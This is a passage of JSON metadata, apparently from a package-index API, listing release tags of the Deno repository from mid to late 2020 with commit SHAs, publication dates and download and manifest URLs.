:"commit","published_at":"2020-12-22T16:00:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.82.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.82.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.82.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.82.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.82.0/manifests"},{"name":"v1.6.1","sha":"b6d5ae1ecd125ce8a14cddc877cb66dbcfc9bb04","kind":"commit","published_at":"2020-12-14T20:25:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.6.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.6.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.6.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.1/manifests"},{"name":"std/0.81.0","sha":"b6d5ae1ecd125ce8a14cddc877cb66dbcfc9bb04","kind":"commit","published_at":"2020-12-14T20:25:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.81.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.81.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.81.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.81.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.81.0/manifests"},{"name":"v1.6.0","sha":"df87bf1d6a43ca36b520b45913839fd1f16df595","kind":"commit","published_at":"2020-12-08T14:37:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.6.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.0/manifests"},{"name":"std/0.80.0","sha":"df87bf1d6a43ca36b520b45913839fd1f16df595","kind":"commit","published_at":"2020-12-08T14:37:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.80.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.80.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.80.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.80.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.80.0/manifests"},{"name":"v1.5.4","sha":"bc79d556496420441977ca6f5c66be3dc3ded187","kind":"commit","published_at":"2020-11-23T14:10:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.4/manifests"},{"name":"std/0.79.0","sha":"bc79d556496420441977ca6f5c66be3dc3ded187","kind":"commit","published_at":"2020-11-23T14:10:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.79.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.79.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.79.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.79.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.79.0/manifests"},{"name":"v1.5.3","sha":"ab7b8ba8d15f37d6244784a16a3f4f3c96e38769","kind":"commit","published_at":"2020-11-16T10:14:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.3/manifests"},{"name":"std/0.78.0","sha":"ab7b8ba8d15f37d6244784a16a3f4f3c96e38769","kind":"commit","published_at":"2020-11-16T10:14:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.78.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.78.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.78.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.78.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.78.0/manifests"},{"name":"v1.5.2","sha":"71d7482577ee187187051ac8d9976a5387c038db","kind":"commit","published_at":"2020-11-08T23:58:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.2/manifests"},{"name":"std/0.77.0","sha":"71d7482577ee187187051ac8d9976a5387c038db","kind":"commit","published_at":"2020-11-08T23:58:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.77.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.77.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.77.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.77.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.77.0/manifests"},{"name":"v1.5.1","sha":"03769f11b5db314c550478852317d9ea108c2f76","kind":"commit","published_at":"2020-10-31T14:32:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.1/manifests"},{"name":"std/0.76.0","sha":"03769f11b5db314c550478852317d9ea108c2f76","kind":"commit","published_at":"2020-10-31T14:32:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.76.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.76.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.76.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.76.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.76.0/manifests"},{"name":"v1.5.0","sha":"dd01f206da0b7e1b305e70cdd3c98bf60fbefc5d","kind":"commit","published_at":"2020-10-27T15:00:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.0/manifests"},{"name":"std/0.75.0","sha":"dd01f206da0b7e1b305e70cdd3c98bf60fbefc5d","kind":"commit","published_at":"2020-10-27T15:00:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.75.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.75.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.75.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.75.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.75.0/manifests"},{"name":"v1.4.6","sha":"9e9ec9784a639ef7205e1e303301ee558439b045","kind":"commit","published_at":"2020-10-10T10:30:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.6","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.6/manifests"},{"name":"v1.4.5","sha":"b5e4b63a880ae41bd33dce5276c925ab7bd9519f","kind":"commit","published_at":"2020-10-08T12:20:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.5/manifests"},{"name":"std/0.74.0","sha":"b5e4b63a880ae41bd33dce5276c925ab7bd9519f","kind":"commit","published_at":"2020-10-08T12:20:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.74.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.74.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.74.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.74.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.74.0/manifests"},{"name":"v1.4.4","sha":"ae1ed2d16687413381fc7e6b55dca9b1676855f6","kind":"commit","published_at":"2020-10-03T12:58:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.4/manifests"},{"name":"std/0.73.0","sha":"ae1ed2d16687413381fc7e6b55dca9b1676855f6","kind":"commit","published_at":"2020-10-03T12:58:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.73.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.73.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.73.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.73.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.73.0/manifests"},{"name":"v1.4.3","sha":"63efa5f15dccf48d7a27f7d55344f1de63f786af","kind":"commit","published_at":"2020-10-02T12:37:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.3/manifests"},{"name":"std/0.72.0","sha":"63efa5f15dccf48d7a27f7d55344f1de63f786af","kind":"commit","published_at":"2020-10-02T12:37:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.72.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.72.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.72.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.72.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.72.0/manifests"},{"name":"v1.4.2","sha":"dacb340f8fe959ebf2949ff6e7480935556a9813","kind":"commit","published_at":"2020-09-25T14:53:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.2/manifests"},{"name":"std/0.71.0","sha":"dacb340f8fe959ebf2949ff6e7480935556a9813","kind":"commit","published_at":"2020-09-25T14:53:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.71.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.71.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.71.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.71.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.71.0/manifests"},{"name":"v1.4.1","sha":"d6f3de6feb006bf6911b938bfa43a3655c962c50","kind":"tag","published_at":"2020-09-18T19:40:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.1/manifests"},{"name":"std/0.70.0","sha":"d6f3de6feb006bf6911b938bfa43a3655c962c50","kind":"tag","published_at":"2020-09-18T19:38:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.70.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.70.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.70.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.70.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.70.0/manifests"},{"name":"v1.4.0","sha":"b3fa81f867f933df41f274bd8eec10dddf1b1b28","kind":"commit","published_at":"2020-09-13T14:35:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.0/manifests"},{"name":"std/0.69.0","sha":"b3fa81f867f933df41f274bd8eec10dddf1b1b28","kind":"commit","published_at":"2020-09-13T14:35:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.69.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.69.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.69.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.69.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.69.0/manifests"},{"name":"v1.3.3","sha":"a14b3c9e30a1b18f70519eac03be5a4648b65036","kind":"commit","published_at":"2020-09-04T16:15:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.3.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.3.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.3/manifests"},{"name":"std/0.68.0","sha":"a14b3c9e30a1b18f70519eac03be5a4648b65036","kind":"commit","published_at":"2020-09-04T16:15:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.68.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.68.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.68.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.68.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.68.0/manifests"},{"name":"v1.3.2","sha":"ac705b793612db6cc11b13270907e216e07460b3","kind":"commit","published_at":"2020-08-29T13:53:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.3.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.2/manifests"},{"name":"std/0.67.0","sha":"ac705b793612db6cc11b13270907e216e07460b3","kind":"commit","published_at":"2020-08-29T13:53:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.67.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.67.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.67.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.67.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.67.0/manifests"},{"name":"v1.3.1","sha":"999e5cf3d44ba41d988f0f3b4f94439a3b794bdc","kind":"commit","published_at":"2020-08-21T16:11:33.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.3.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.1/manifests"},{"name":"std/0.66.0","sha":"999e5cf3d44ba41d988f0f3b4f94439a3b794bdc","kind":"commit","published_at":"2020-08-21T16:11:33.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.66.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.66.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.66.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.66.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.66.0/manifests"},{"name":"v1.3.0","sha":"b38c3132768e0f5132763db9c8fdc2a4a9490bde","kind":"commit","published_at":"2020-08-13T16:10:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.3.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.0/manifests"},{"name":"std/0.65.0","sha":"b38c3132768e0f5132763db9c8fdc2a4a9490bde","kind":"commit","published_at":"2020-08-13T16:10:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.65.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.65.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.65.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.65.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.65.0/manifests"},{"name":"v1.2.3","sha":"92a173bca618cf6ef1e54c08deee61ba617491b9","kind":"commit","published_at":"2020-08-08T22:59:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.2.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.2.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.2.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.3/manifests"},{"name":"std/0.64.0","sha":"92a173bca618cf6ef1e54c08deee61ba617491b9","kind":"commit","published_at":"2020-08-08T22:59:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.64.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.64.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.64.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.64.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.64.0/manifests"},{"name":"v1.2.2","sha":"7446230e6b39a0d3ce70b8fffbed3ebc63e8c762","kind":"commit","published_at":"2020-07-31T19:14:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.2.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.2/manifests"},{"name":"std/0.63.0","sha":"7446230e6b39a0d3ce70b8fffbed3ebc63e8c762","kind":"commit","published_at":"2020-07-31T19:14:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.63.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.63.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.63.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.63.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.63.0/manifests"},{"name":"v1.2.1","sha":"25a0ad3e16e767d58b1315e9d12a236ea36c5998","kind":"commit","published_at":"2020-07-24T10:32:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.2.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.1/manifests"},{"name":"std/0.62.0","sha":"25a0ad3e16e767d58b1315e9d12a236ea36c5998","kind":"commit","published_at":"2020-07-24T10:32:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.62.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.62.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.62.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.62.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.62.0/manifests"},{"name":"v1.2.0","sha":"6af5149ea3d9b0accf7122073abbf852e355846f","kind":"commit","published_at":"2020-07-13T17:00:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.2.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.0/manifests"},{"name":"std/0.61.0","sha":"6af5149ea3d9b0accf7122073abbf852e355846f","kind":"commit","published_at":"2020-07-13T17:00:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.61.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.61.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.61.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.61.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.61.0/manifests"},{"name":"v1.1.3","sha":"be07aaed84946a13ec514c39606e2030e47af73f","kind":"commit","published_at":"2020-07-03T19:35:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.1.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.3/manifests"},{"name":"std/0.60.0","sha":"be07aaed84946a13ec514c39606e2030e47af73f","kind":"commit","published_at":"2020-07-03T19:35:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.60.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.60.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.60.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.60.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.60.0/manifests"},{"name":"v1.1.2","sha":"5bc130be2722fe54d42004cc48536b390437ede3","kind":"commit","published_at":"2020-06-26T21:45:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.1.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.2/manifests"},{"name":"std/0.59.0","sha":"5bc130be2722fe54d42004cc48536b390437ede3","kind":"commit","published_at":"2020-06-26T21:45:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.59.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.59.0","dependencies_parsed_at":null,"